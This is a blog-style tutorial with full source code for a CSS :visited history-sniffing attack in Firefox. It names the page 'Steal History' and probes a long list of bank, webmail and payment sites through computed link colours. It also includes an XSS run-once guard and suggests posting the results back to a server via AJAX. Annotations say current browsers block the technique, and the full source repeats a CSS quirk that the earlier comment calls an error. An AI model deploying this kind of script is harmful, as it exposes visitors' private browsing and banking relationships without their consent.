Firefox + CSS Hack : I Know Where You've been

By default, any web browser marks visited links with a distinct color. CSS lets us change this visited-link color to any color that matches the web site's theme.

Well, that behaviour is an advantage for people who want to steal your browser history. Yeah, you got that: by detecting the link color. I will show you how to do that in Mozilla Firefox. This sort of hack is taken from Jeremiah Grossman's blog, with some changes I made.

First, we need to mark visited link with our own distinct color, for that we’ll use CSS,

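<style type="text/css">
  /* Sentinel colour for visited links. It has to be white, rgb(255,255,255),
     because that is the value the script compares the computed colour with.
     The rule is closed with "}" only: a ";" after the brace is not part of
     the rule and would be parsed as the start of the next selector. */
  a:visited { color: rgb(255,255,255); }
</style>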

Now, any visited link will be marked in white.

Next, since this hack only works in Mozilla Firefox, we need to detect the user’s browser using this simple JavaScript,

// Lower-case the User-Agent string and record whether it contains "mozilla".
// NOTE(review): most browsers' User-Agent strings start with "Mozilla/", so
// this substring test is true for far more than Firefox; treat is_mozilla as
// a loose hint, not as browser identification.
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

Create an array of popular websites that your visitor might have visited, as shown below. You can add more to the list if you like.

// URLs whose visited state the page tests; the loop further down creates one
// temporary link per entry.
var websites = [
   "http://www.ngoprekweb.com/",
   "http://digg.com/",
   "http://login.yahoo.com/",
   "http://mail.google.com/",
   "http://mail.yahoo.com/",
   "http://reddit.com/",
   "http://www.amazon.com/",
   "http://www.blogger.com/",
   "http://www.bloglines.com/",
   "http://www.google.com/",
   "http://www.microsoft.com/",
];

Finally, loop through the website list above and, for each entry, create a temporary anchor element and check whether its color matches the visited-link color we set earlier; print the URL if it matches.

   // For every entry in websites: attach a temporary <a> to the document, read
   // its computed colour, detach it again, and print the URL when the colour
   // equals the a:visited sentinel.
   // NOTE(review): browsers later changed getComputedStyle() to report the
   // unvisited style for every link and limited what :visited rules may change,
   // so in current browsers this read no longer reveals visit state.
   for (var i = 0; i < websites.length; i++) {
      var link = document.createElement("a");
      link.id = "id" + i;
      link.href = websites[i];
      // The text comes from the fixed list above. With untrusted strings
      // innerHTML would be an injection sink; textContent is the safer property.
      link.innerHTML = websites[i];
      // The link must be in the document for the stylesheet to apply to it.
      document.body.appendChild(link);
      var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
      document.body.removeChild(link);       

      // check for visited: the computed colour is compared as a string with
      // the serialised form of white
      if (color == "rgb(255, 255, 255)") {
        document.write('' + websites[i] + '<br />');
      }
   }

That’s it. Now you can show your user where he/she has been. Usually you also need to prevent multiple XSS loads. And with additional AJAX you can also send this information back to your server. Ooops.

You can try this out by clicking here. Don’t worry, I won’t save any of your browser history.

Now, this is my complete source,

<html>
  <head>
    <title>Steal History</title>
    <style type="text/css">
      /* Sentinel colour: the script below compares each temporary link's
         computed colour with this value. */
      a:visited { color: rgb(255,255,255) };
    </style>
  </head>
  <body>

  <script language="javascript">
    // Lower-case the User-Agent string and record whether it contains "mozilla".
    // NOTE(review): most browsers' User-Agent strings start with "Mozilla/", so
    // this substring test is true for far more than Firefox; treat is_mozilla
    // as a loose hint, not as browser identification.
    var agent = navigator.userAgent.toLowerCase();
    var is_mozilla = (agent.indexOf("mozilla") != -1);

    // URLs whose visited state stealHistory() tests, one temporary link per entry.
    // The list mixes news, webmail and banking hosts; which of these a visitor
    // has used is the private information this page is about.
    var websites = [
       "http://www.ngoprekweb.com/",
       "http://ajaxian.com/",
       "http://digg.com/",
       "http://english.aljazeera.net/HomePage",
       "http://ha.ckers.org",
       "http://ha.ckers.org/blog/",
       "http://jeremiahgrossman.blogspot.com/",
       "http://login.yahoo.com/",
       "http://mail.google.com/",
       "http://mail.yahoo.com/",
       "http://my.yahoo.com/",
       "http://reddit.com/",
       "http://seoblackhat.com",
       "http://slashdot.org/",
       "http://techfoolery.com/",
       "http://weblogs.asp.net/jezell/",
       "http://www.amazon.com/",
       "http://www.aol.com/",
       "http://www.bankofamerica.com/",
       "http://www.bankone.com/",
       "http://www.blackhat.com/",
       "http://www.blogger.com/",
       "http://www.bloglines.com/",
       "http://www.bofa.com/",
       "http://www.capitalone.com/",
       "http://www.cenzic.com",
       "http://www.cgisecurity.com",
       "http://www.chase.com/",
       "http://www.citibank.com/",
       "http://www.cnn.com/",
       "http://www.comerica.com/",
       "http://www.e-gold.com/",
       "http://www.ebay.com/",
       "http://www.etrade.com/",
       "http://www.expedia.com/",
       "http://www.google.com/",
       "http://www.hsbc.com/",
       "http://www.icq.com/",
       "http://www.jailbabes.com",
       "http://www.microsoft.com/",
       "http://www.msn.com/",
       "http://www.myspace.com/",
       "http://www.ntobjectives.com",
       "http://www.passport.net/",
       "http://www.paypal.com/",
       "http://www.sourceforge.net/",
       "http://www.spidynamics.com",
       "http://www.statefarm.com/",
       "http://www.usbank.com/",
       "http://www.wachovia.com/",
       "http://www.wamu.com/",
       "http://www.watchfire.com",
       "http://www.webappsec.org",
       "http://www.wellsfargo.com/",
       "http://www.whitehatsec.com",
       "http://www.xanga.com/",
       "http://www.yahoo.com/",
       "http://seoblackhat.com/",
       "http://www.alexa.com/",
       "http://www.youtube.com/",
       "https://banking.wellsfargo.com/",
       "https://commerce.blackhat.com/",
       "https://online.wellsfargo.com/",
    ];

    /* Run-once guard: the element with id 'xss_flag' marks that this script
       has already executed in the document, so a second load does nothing. */
    if (! document.getElementById('xss_flag')) {
       var d = document.createElement('div');
       d.id = 'xss_flag';
       document.body.appendChild(d);

       // d is redeclared and reused for an empty table with id 'data'.
       // NOTE(review): the DOM properties are cellPadding and cellSpacing; the
       // lower-case names assigned here are probably plain expando properties
       // with no effect on layout.
       var d = document.createElement('table');
       d.border = 0;
       d.cellpadding = 5;
       d.cellspacing = 10;
       d.width = '90%';
       d.align = 'center';
       d.id = 'data';
       document.body.appendChild(d);

       // Writes an empty string into the document.
       document.write('');

       /* Run the history check only when the User-Agent test passed.
          stealHistory is declared further down; function declarations are
          hoisted, so the call is valid here. */
       if (is_mozilla) {
        stealHistory();
       }
    }

    /**
     * For every entry in the global websites array: attach a temporary <a> to
     * the document, read its computed colour, detach it again, and write the
     * URL into the page when the colour equals the a:visited sentinel.
     * Takes no arguments and returns nothing.
     *
     * NOTE(review): browsers later changed getComputedStyle() to report the
     * unvisited style for every link and limited what :visited rules may
     * change, so in current browsers this read no longer reveals visit state.
     */
    function stealHistory() {
       // loop through websites and check which ones have been visited
       for (var i = 0; i < websites.length; i++) {
        var link = document.createElement("a");
        link.id = "id" + i;
        link.href = websites[i];
        // The text comes from the fixed list above. With untrusted strings
        // innerHTML would be an injection sink; textContent is the safer property.
        link.innerHTML = websites[i];
        // The link must be in the document for the stylesheet to apply to it.
        document.body.appendChild(link);
        var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
        document.body.removeChild(link);       

        // check for visited: the computed colour is compared as a string with
        // the serialised form of white
        if (color == "rgb(255, 255, 255)") {
          document.write('' + websites[i] + '<br />');
        } // end visited check

       } // end visited website loop

    } // end stealHistory method

    </script>

  </body>
</html>
